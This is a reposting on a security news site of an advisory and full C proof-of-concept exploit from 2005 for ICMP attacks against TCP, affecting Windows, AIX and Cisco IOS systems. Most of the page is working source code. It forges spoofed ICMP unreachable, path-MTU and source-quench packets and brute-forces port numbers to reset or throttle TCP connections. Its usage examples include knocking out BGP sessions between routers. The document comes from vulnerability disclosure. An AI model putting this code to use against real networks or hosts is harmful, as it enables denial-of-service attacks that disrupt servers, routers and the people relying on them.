首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ICMP Attacks Against TCP Vulnerability Exploit
来源:houseofdabus 作者:HOD 发布时间:2005-04-22  

ICMP Attacks Against TCP Vulnerability Exploit

Summary
Attackers can send a specially crafted Internet Control Message Protocol (ICMP) message that will cause a denial of service for the affected systems. An attacker who successfully exploited this vulnerability could cause the affected system to reset existing TCP connections, reduce the throughput in existing TCP connections, or consume large amounts of CPU and memory resources.

Credit:
The information has been provided by houseofdabus HOD.
The original article can be found at: http://www.livejournal.com/users/houseofdabus/
For more information please see the following links: http://www.securiteam.com/windowsntfocus/5IP0J0UFFM.html,
http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml,
http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html and http://www.kb.cert.org/vuls/id/222750

Details
Vulnerable Systems:
* Cisco Content Services Switch 11000 Series (WebNS)
* Cisco Global Site Selector (GSS) 4480 1.x
* Cisco IOS 10.x
* Cisco IOS 11.x
* Cisco IOS 12.x
* Cisco IOS R11.x
* Cisco IOS R12.x
* Cisco IOS XR (CRS-1) 3.x
* Cisco ONS 15000 Series
* Cisco PIX 6.x
* Cisco SAN-OS 1.x (MDS 9000 Switches)
* AIX 5.x
* Windows Server 2003
* Windows XP SP2
* Windows XP SP1
* Windows 2000 SP4
* Windows 2000 SP3

Exploit:
/* HOD-icmp-attacks-poc.c: 2005-04-15: PUBLIC v.0.2
*
* Copyright (c) 2004-2005 houseofdabus.
*
* (MS05-019) (CISCO:20050412)
* ICMP attacks against TCP (Proof-of-Concept)
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* [ for more details:
* [ http://www.livejournal.com/users/houseofdabus
* ---------------------------------------------------------------------
* Systems Affected:
* - Cisco Content Services Switch 11000 Series (WebNS)
* - Cisco Global Site Selector (GSS) 4480 1.x
* - Cisco IOS 10.x
* - Cisco IOS 11.x
* - Cisco IOS 12.x
* - Cisco IOS R11.x
* - Cisco IOS R12.x
* - Cisco IOS XR (CRS-1) 3.x
* - Cisco ONS 15000 Series
* - Cisco PIX 6.x
* - Cisco SAN-OS 1.x (MDS 9000 Switches)
* - AIX 5.x
* - Windows Server 2003
* - Windows XP SP2
* - Windows XP SP1
* - Windows 2000 SP4
* - Windows 2000 SP3
* ...
*
* ---------------------------------------------------------------------
* Description:
* A denial of service vulnerability exists that could allow an
* attacker to send a specially crafted Internet Control Message
* Protocol (ICMP) message to an affected system. An attacker who
* successfully exploited this vulnerability could cause the affected
* system to reset existing TCP connections, reduce the throughput
* in existing TCP connections, or consume large amounts of CPU and
* memory resources.
* (CAN-2004-0790, CAN-2004-0791, CAN-2004-1060)
*
* ---------------------------------------------------------------------
* Solution:
* http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx
* http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml
*
* Other References:
* http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html
* http://www.kb.cert.org/vuls/id/222750
*
* ---------------------------------------------------------------------
* Tested on:
* - Windows Server 2003
* - Windows XP SP1
* - Windows 2000 SP4
* - Cisco IOS 11.x
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c
* Win32/cygwin: gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c
* Linux : gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c
*
* ---------------------------------------------------------------------
* Examples:
*
* client <---> router <---> router <---> server
*
* CLIENT <---> SERVER
*
* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:1
* (abort the connection)
*
* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:2
* (slow down the transmission rate for traffic)
*
*
* ROUTER1 <---> ROUTER2
*
* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:179 -a:1
* (DoS Cisco BGP Connections)
*
* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:80 -a:2
* (slow down the transmission rate for traffic)
*
* ---------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
*/


/* #define _WIN32 */

#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
/* IP_HDRINCL */
#include <ws2tcpip.h>

#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/timeb.h>
#endif

#include <string.h>
#include <stdio.h>
#include <stdlib.h>

#define MAX_PACKET 4096

#define DEFAULT_PORT 80
#define DEFAULT_IP "192.168.0.1"
#define DEFAULT_COUNT 1


/* Define the IP header */
typedef struct ip_hdr {
unsigned char ip_verlen; /* IP version & length */
unsigned char ip_tos; /* IP type of service */
unsigned short ip_totallength; /* Total length */
unsigned short ip_id; /* Unique identifier */
unsigned short ip_offset; /* Fragment offset field */
unsigned char ip_ttl; /* Time to live */
unsigned char ip_protocol; /* Protocol */
unsigned short ip_checksum; /* IP checksum */
unsigned int ip_srcaddr; /* Source address */
unsigned int ip_destaddr; /* Destination address */
} IP_HDR, *PIP_HDR;


/* Define the ICMP header */
/* Destination Unreachable Message */
typedef struct icmp_hdr {
unsigned char type; /* Type */
unsigned char code; /* Code */
unsigned short checksum; /* Checksum */
unsigned long unused; /* Unused */
} ICMP_HDR, *PICMP_HDR;


/* 64 bits of Original Data Datagram (TCP header) */
char msg[] =
"\x00\x50" /* Source port */
"\x00\x50" /* Destination port */
"\x23\x48\x4f\x44";

/* globals */
unsigned long dwToIP, /* IP to send to */
dwFromIP; /* IP to send from (spoof) */
unsigned short iToPort, /* Port to send to */
iFromPort; /* Port to send from (spoof) */
unsigned long dwCount; /* Number of times to send */
unsigned long Attack;

void
usage(char *progname) {
printf("Usage:\n\n");
printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> <-fi:SRC-PORT> [-tp:int] [-a:int] [-n:int]\n\n", progname);
printf(" -fi:IP From (sender) IP address\n");
printf(" -ti:IP To (target) IP address\n");
printf(" -fp:int Target open TCP port number\n");
printf(" (for example - 21, 25, 80)\n");
printf(" -tp:int Inicial value for bruteforce (sender) TCP port number\n");
printf(" (default: 0 = range of ports 0-65535)\n");
printf(" -n:int Number of packets\n\n");
printf(" -a:int ICMP attacks:\n");
printf(" 1 - Blind connection-reset attack\n");
printf(" (ICMP protocol unreachable)\n");
printf(" 2 - Path MTU discovery attack\n");
printf(" (slow down the transmission rate)\n");
printf(" 3 - ICMP Source Quench attack\n");
exit(1);
}

void
ValidateArgs(int argc, char **argv)
{
int i;

iToPort = 0;
iFromPort = DEFAULT_PORT;
dwToIP = inet_addr(DEFAULT_IP);
dwFromIP = inet_addr(DEFAULT_IP);
dwCount = DEFAULT_COUNT;
Attack = 1;

for (i = 1; i < argc; i++) {
if ((argv[i][0] == '-') || (argv[i][0] == '/')) {
switch (tolower(argv[i][1])) {
case 'f':
switch (tolower(argv[i][2])) {
case 'p':
if (strlen(argv[i]) > 4)
iFromPort = atoi(&argv[i][4]);
break;
case 'i':
if (strlen(argv[i]) > 4)
dwFromIP = inet_addr(&argv[i][4]);
break;
default:
usage(argv[0]);
break;
}
break;
case 't':
switch (tolower(argv[i][2])) {
case 'p':
if (strlen(argv[i]) > 4)
iToPort = atoi(&argv[i][4]);
break;
case 'i':
if (strlen(argv[i]) > 4)
dwToIP = inet_addr(&argv[i][4]);
break;
default:
usage(argv[0]);
break;
}
break;
case 'n':
if (strlen(argv[i]) > 3)
dwCount = atol(&argv[i][3]);
break;
case 'a':
if (strlen(argv[i]) > 3)
Attack = atol(&argv[i][3]);
if ((Attack > 3) || (Attack < 1))
usage(argv[0]);
break;
default:
usage(argv[0]);
break;
}
}
}
return;
}


/* This function calculates the 16-bit one's complement sum */
/* for the supplied buffer */
unsigned short
checksum(unsigned short *buffer, int size)
{
unsigned long cksum = 0;

while (size > 1) {
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if (size) {
cksum += *(unsigned char *)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);

return (unsigned short)(~cksum);
}

int
main(int argc, char **argv)
{

#ifdef _WIN32
WSADATA wsd;
#endif
int s;
#ifdef _WIN32
BOOL bOpt;
#else
int bOpt;
#endif
struct sockaddr_in remote;
IP_HDR ipHdr,
ipHdrInc;
ICMP_HDR icmpHdr;
int ret;
unsigned long i, p;
unsigned short iTotalSize,
iIPVersion,
iIPSize,
p2,
cksum = 0;
char buf[MAX_PACKET],
*ptr = NULL;
#ifdef _WIN32
IN_ADDR addr;
#else
struct sockaddr_in addr;
#endif

printf("\n (MS05-019) (CISCO:20050412)\n");
printf(" ICMP attacks against TCP (Proof-of-Concept)\n\n");
printf(" Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n");

if (argc < 3) usage(argv[0]);

/* Parse command line arguments and print them out */
ValidateArgs(argc, argv);
#ifdef _WIN32
addr.S_un.S_addr = dwFromIP;
printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr), iFromPort);
addr.S_un.S_addr = dwToIP;
printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr), iToPort);
printf("[*] Count: %d\n", dwCount);
#else
addr.sin_addr.s_addr = dwFromIP;
printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iFromPort);
addr.sin_addr.s_addr = dwToIP;
printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iToPort);
printf("[*] Count: %d\n", dwCount);
#endif

#ifdef _WIN32
if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {
printf("[-] WSAStartup() failed: %d\n", GetLastError());
return -1;
}
#endif
/* Creating a raw socket */
s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
#ifdef _WIN32
if (s == INVALID_SOCKET) {
#else
if (s < 0) {
#endif
printf("[-] socket() failed\n");
return -1;
}


/* Enable the IP header include option */
#ifdef _WIN32
bOpt = TRUE;
#else
bOpt = 1;
#endif
ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));
#ifdef _WIN32
if (ret == SOCKET_ERROR) {
printf("[-] setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError());
return -1;
}
#endif


/* Initalize the IP header */
iTotalSize = sizeof(ipHdr) + sizeof(icmpHdr) + sizeof(msg)-1 + sizeof(ipHdrInc);

iIPVersion = 4;
iIPSize = sizeof(ipHdr) / sizeof(unsigned long);

ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;
ipHdr.ip_tos = 0; /* IP type of service */
/* Total packet len */
ipHdr.ip_totallength = htons(iTotalSize);
ipHdr.ip_id = htons(42451); /* Unique identifier */
ipHdr.ip_offset = 0; /* Fragment offset field */
ipHdr.ip_ttl = 255; /* Time to live */
ipHdr.ip_protocol = 0x1; /* Protocol(ICMP) */
ipHdr.ip_checksum = 0; /* IP checksum */
ipHdr.ip_srcaddr = dwFromIP; /* Source address */
ipHdr.ip_destaddr = dwToIP; /* Destination address */


ipHdrInc.ip_verlen = (iIPVersion << 4) | iIPSize;
ipHdrInc.ip_tos = 0; /* IP type of service */
/* Total packet len */
ipHdrInc.ip_totallength = htons(sizeof(ipHdrInc)+20);
ipHdrInc.ip_id = htons(25068); /* Unique identifier */
ipHdrInc.ip_offset = 0; /* Fragment offset field */
ipHdrInc.ip_ttl = 255; /* Time to live */
ipHdrInc.ip_protocol = 0x6; /* Protocol(TCP) */
ipHdrInc.ip_checksum = 0; /* IP checksum */
ipHdrInc.ip_srcaddr = dwToIP; /* Source address */
ipHdrInc.ip_destaddr = dwFromIP;/* Destination address */


/* Initalize the ICMP header */
icmpHdr.checksum = 0;
if (Attack == 1) {
icmpHdr.type = 3; /* Destination Unreachable Message */
icmpHdr.code = 2; /* protocol unreachable */
icmpHdr.unused = 0;
} else if (Attack == 2) {
icmpHdr.type = 3; /* Destination Unreachable Message */
icmpHdr.code = 4; /* fragmentation needed and DF set */
icmpHdr.unused = 0x44000000; /* next-hop MTU - 68 */
} else {
icmpHdr.type = 4; /* Source Quench Message */
icmpHdr.code = 0;
icmpHdr.unused = 0;
}

memset(buf, 0, MAX_PACKET);
ptr = buf;

memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr);
memcpy(ptr, &icmpHdr, sizeof(icmpHdr)); ptr += sizeof(icmpHdr);
memcpy(ptr, &ipHdrInc, sizeof(ipHdrInc)); ptr += sizeof(ipHdrInc);
memcpy(ptr, msg, sizeof(msg)-1);
iFromPort = htons(iFromPort);
memcpy(ptr, &iFromPort, 2);

remote.sin_family = AF_INET;
remote.sin_port = htons(iToPort);
remote.sin_addr.s_addr = dwToIP;

cksum = checksum((unsigned short *)&ipHdrInc, 20);
memcpy(buf+20+sizeof(icmpHdr)+10, &cksum, 2);

cksum = checksum((unsigned short *)&ipHdr, 20);
memcpy(buf+10, &cksum, 2);

for (p = iToPort; p <= 65535; p++) {
p2 = htons((short)p);
memcpy((char *)(ptr+2), &p2, 2);
buf[22] = 0;
buf[23] = 0;
cksum = checksum((unsigned short *)(buf+20), sizeof(icmpHdr)+28);
memcpy(buf+20+2, &cksum, 2);

for (i = 0; i < dwCount; i++) {
#ifdef _WIN32
ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote,
sizeof(remote));
#else
ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote,
sizeof(remote));
#endif
#ifdef _WIN32
if (ret == SOCKET_ERROR) {
#else
if (ret < 0) {
#endif
printf("[-] sendto() failed\n");
break;
}
}
}

#ifdef _WIN32
closesocket(s);
WSACleanup();
#endif

return 0;
}

/* EOF */



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Multiple Exploit Codes for Ora
·BitchX Buffer Overflow
·PMsoftware Mini HTTP Server Re
·phpBB Knowledge Base模块SQL注
·Multiple Vendor TCP/IP Impleme
·ASPNuke comments.asp and detai
·WheresJames Webcam Publisher R
·MSN Messenger PNG Image Buffer
·UBB Threads printthread.php Re
·FOXmail POC exploit
·Microsoft Exchange Server Remo
·Savant Web Server 3.1 Remote B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved